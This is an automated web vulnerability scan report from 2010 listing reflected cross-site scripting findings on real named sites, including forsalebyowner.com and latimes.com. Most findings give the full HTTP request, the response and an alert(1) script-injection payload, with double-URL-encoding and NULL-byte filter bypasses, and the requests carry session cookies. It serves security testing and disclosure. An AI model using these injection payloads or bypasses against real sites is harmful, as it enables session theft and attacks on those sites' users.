Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.forsalebyowner.com/22625219 [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.forsalebyowner.com
Path:
/22625219
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd25b"><script>alert(1)</script>c2c77e7f69e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /22625219?bd25b"><script>alert(1)</script>c2c77e7f69e=1 HTTP/1.1 Host: www.forsalebyowner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
1.2. http://www.forsalebyowner.com/content/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.forsalebyowner.com
Path:
/content/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14576%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e15a6b254d06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14576\\\"><script>alert(1)</script>15a6b254d06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /content/index.php?option=com_content&id/14576%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e15a6b254d06=142 HTTP/1.1 Host: www.forsalebyowner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:54:18 GMT Server: Apache Set-Cookie2: FSBO=144.142.228.219.1292180058479324; path=/; max-age=86400 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: b1a4ae362090dfc039c82666bbc9b309=b94a8d58190a54436e5d37bff92144cd; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Last-Modified: Sun, 12 Dec 2010 18:54:18 GMT Vary: Accept-Encoding WebServer: web4 Diagnostics: t=1292180058479065 D=99991 Content-Length: 27443 Keep-Alive: timeout=60, max=454 Connection: Keep-Alive Content-Type: text/html; charset=utf-8
1.3. http://www.forsalebyowner.com/framewrap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.forsalebyowner.com
Path:
/framewrap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d56c"><script>alert(1)</script>c75153ebd9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d56c\"><script>alert(1)</script>c75153ebd9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /framewrap.html?url=http://p01.bestplaces.net/fsbo/nh/col1.asp&8d56c"><script>alert(1)</script>c75153ebd9a=1 HTTP/1.1 Host: www.forsalebyowner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b365c"><script>alert(1)</script>304f5c9456c was submitted in the url parameter. This input was echoed as b365c\"><script>alert(1)</script>304f5c9456c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /framewrap.html?url=http://p01.bestplaces.net/fsbo/nh/col1.aspb365c"><script>alert(1)</script>304f5c9456c HTTP/1.1 Host: www.forsalebyowner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=iso-885 ...[SNIP]... <iframe id="FrameRTQ" src="http://p01.bestplaces.net/fsbo/nh/col1.aspb365c\"><script>alert(1)</script>304f5c9456c?" width="600" height="600" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="auto" align="center" style="margin-top:6px;"> ...[SNIP]...
1.5. http://www.forsalebyowner.com/listing/19916 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.forsalebyowner.com
Path:
/listing/19916
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c158"><script>alert(1)</script>f7bb22fc95f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /listing/19916?5c158"><script>alert(1)</script>f7bb22fc95f=1 HTTP/1.1 Host: www.forsalebyowner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
1.6. http://www.forsalebyowner.com/listing/3FCC5 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.forsalebyowner.com
Path:
/listing/3FCC5
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fe5a"><script>alert(1)</script>57511cacdc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /listing/3FCC5?6fe5a"><script>alert(1)</script>57511cacdc6=1 HTTP/1.1 Host: www.forsalebyowner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
1.7. http://www.forsalebyowner.com/listing/EC84C [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.forsalebyowner.com
Path:
/listing/EC84C
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b10"><script>alert(1)</script>b0b028cefaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /listing/EC84C?74b10"><script>alert(1)</script>b0b028cefaa=1 HTTP/1.1 Host: www.forsalebyowner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=b8b1f284861a7889ce7c174682f5817f; szPID=TIF1%2C2010-12-12+13%3A42%3A42;
The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c16"><script>alert(1)</script>579382e6df was submitted in the partner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dl/index.jhtml?spid=473&spu=true&partner=ZLxdm00336c16"><script>alert(1)</script>579382e6df HTTP/1.1 Host: www.iwon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:54:37 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28 Content-Language: en Connection: close Content-Type: text/html;charset=UTF-8 Set-Cookie: ltm=2516670986.20480.0000; expires=Sun, 26-Dec-2010 18:54:38 GMT; path=/ Content-Length: 56270
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the watchId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af696"%3balert(1)//31a72675676 was submitted in the watchId parameter. This input was echoed as af696";alert(1)//31a72675676 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videobeta/?watchId=3a7f00a4-099b-4806-b78f-37c316fcb6c4af696"%3balert(1)//31a72675676 HTTP/1.1 Host: www.ktla.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007738b"><script>alert(1)</script>b76e620781 was submitted in the class parameter. This input was echoed as 7738b"><script>alert(1)</script>b76e620781 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /classified/automotive/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=9010%2C+72100%007738b"><script>alert(1)</script>b76e620781&class=9020%2C+72300&class=9015%2C+72600&days=7&date=all HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=ISO-8859-1 X-Instance-Name: i6s28z1n1 Cache-Control: private, max-age=299 Date: Sun, 12 Dec 2010 18:58:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 124521
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6292"><script>alert(1)</script>6f53d9163ef was submitted in the class parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/automotive/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=4200-5998%2C+51810%2C+51820%2C+51830%2C+51850%2C+51860%2C+51870%2C+55014%2C+52100%2C+52200%2C+52300%2C+54600%2C+54620%2C+54640%2C+54660%2C+54680%2C+54700%2C+54800%2C+54820%2C+54840%2C+54860f6292"><script>alert(1)</script>6f53d9163ef&days=7&date=all HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=ISO-8859-1 X-Instance-Name: i6s29z1n1 Cache-Control: private, max-age=300 Date: Sun, 12 Dec 2010 18:58:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 132511
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the days request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d84e"><script>alert(1)</script>5224f5a2dcf was submitted in the days parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/automotive/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=4200-5998%2C+51810%2C+51820%2C+51830%2C+51850%2C+51860%2C+51870%2C+55014%2C+52100%2C+52200%2C+52300%2C+54600%2C+54620%2C+54640%2C+54660%2C+54680%2C+54700%2C+54800%2C+54820%2C+54840%2C+54860&days=79d84e"><script>alert(1)</script>5224f5a2dcf&date=all HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=ISO-8859-1 X-Instance-Name: i6s30z1n1 Cache-Control: private, max-age=300 Date: Sun, 12 Dec 2010 18:58:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 132523
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
1.13. http://www.latimes.com/classified/automotive/results.classified [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.latimes.com
Path:
/classified/automotive/results.classified
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4666"><script>alert(1)</script>6b4b288ed86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /classified/automotive/results.classified?start_date=%3C+today&end_date=&sortfields=graphic+desc%2C+start_date+desc%2C+title&keyword=&type=boolean&class=4200-5998%2C+51810%2C+51820%2C+51830%2C+51850%2C+51860%2C+51870%2C+55014%2C+52100%2C+52200%2C+52300%2C+54600%2C+54620%2C+54640%2C+54660%2C+54680%2C+54700%2C+54800%2C+54820%2C+54840%2C+54860&days=7&date=all&e4666"><script>alert(1)</script>6b4b288ed86=1 HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=ISO-8859-1 X-Instance-Name: i6s27z2n1 Cache-Control: private, max-age=300 Date: Sun, 12 Dec 2010 18:59:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 132421
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f72f7"%3balert(1)//bf1d7350563 was submitted in the categoryId parameter. This input was echoed as f72f7";alert(1)//bf1d7350563 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=UTF-8 X-Instance-Name: i6s29z2n1 Vary: Accept-Encoding Cache-Control: private, max-age=297 Date: Sun, 12 Dec 2010 18:53:56 GMT Connection: close Content-Length: 9238
<html> <head>
</head> <body style="margin:0px;"> <script src="/hive/javascripts/video-tool.js" type="text/javascript"></script> <script src="/hive/javascripts/AC_OETag ...[SNIP]... inor version of Flash required var requiredRevision = 0; //video URL - use itemId = unique single video id var singleTemp = "empty"; var multipleTemp = "2b1ee0af-96d0-4513-9efa-6fea81c043daf72f7";alert(1)//bf1d7350563"; var marketDomain = "latimes.com"; marketDomain = marketDomain.split(".");
var frameID = "tivideo-1799444053";
// Omniture account var omnitureAccount = "tribglobaldev"; var om ...[SNIP]...
The value of the itemId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccb1f"%3balert(1)//5a3144ce737 was submitted in the itemId parameter. This input was echoed as ccb1f";alert(1)//5a3144ce737 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=UTF-8 X-Instance-Name: i6s27z1n1 Vary: Accept-Encoding Cache-Control: private, max-age=276 Date: Sun, 12 Dec 2010 18:53:56 GMT Connection: close Content-Length: 9228
<html> <head>
</head> <body style="margin:0px;"> <script src="/hive/javascripts/video-tool.js" type="text/javascript"></script> <script src="/hive/javascripts/AC_OETag ...[SNIP]... version of Flash required var requiredMinorVersion = 0; // Minor version of Flash required var requiredRevision = 0; //video URL - use itemId = unique single video id var singleTemp = "ccb1f";alert(1)//5a3144ce737"; var multipleTemp = "2b1ee0af-96d0-4513-9efa-6fea81c043da"; var marketDomain = "latimes.com"; marketDomain = marketDomain.split(".");
